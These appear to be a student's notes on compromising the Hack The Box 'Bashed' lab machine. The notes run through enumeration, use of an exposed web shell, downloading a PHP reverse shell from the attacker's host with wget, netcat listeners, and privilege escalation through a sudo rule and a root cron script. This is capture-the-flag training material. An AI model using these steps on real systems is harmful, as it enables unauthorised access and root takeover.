TCM PEH Hacking Bashed Notes


HTB Bashed

Recording actions to derive method

nmap -A -T4 -p-
Noted open port 80
Noted Apache 2.4.18
Noted Ubuntu OS
searchsploit apache 2.4
Noted results apache2ctl local exploit
Visited in browser
Navigated around
port 80
go faster
medium wordlist
directories and file extensions
extension php
Letting dirbuster run
Viewed source for a few pages, nothing unusual
Dirbuster results
Noted /uploads
Noted /dev
Noted /dev/phpbash
Navigated to
Noted that it’s a web shell
cd /; ls
ls /home
ls /home/
cd arrexel
cat user.txt
sudo -l
Noted can run scriptmanager with NOPASSWD
sudo su scriptmanager
Noted no tty present for user scriptmanager
Changed IP and PORT
Saved as rev.php
Created netcat listener
Created python http server from rev.php’s directory
In webshell
wget http://hisIP/rev.php
Noted rev.php exists
Navigated to /
Noted shell connected
Noted can’t access tty
python -c 'import pty; pty.spawn("/bin/bash");'
sudo su scriptmanager
Noted failed to switch user
sudo -u scriptmanager /bin/bash
Noted that we are now scriptmanager!
ls -la
cd scripts
ls -la
Noted and test.txt
Noted it opens test.txt, writes to it, then closes it
Noted that time ran was mere minutes ago
Noted that means cronjob
Noted it’s saving test.txt as root
Copy/pasted python reverse shell into (
Started new netcat listener
Noted ran and netcat caught shell
Noted shell user is root
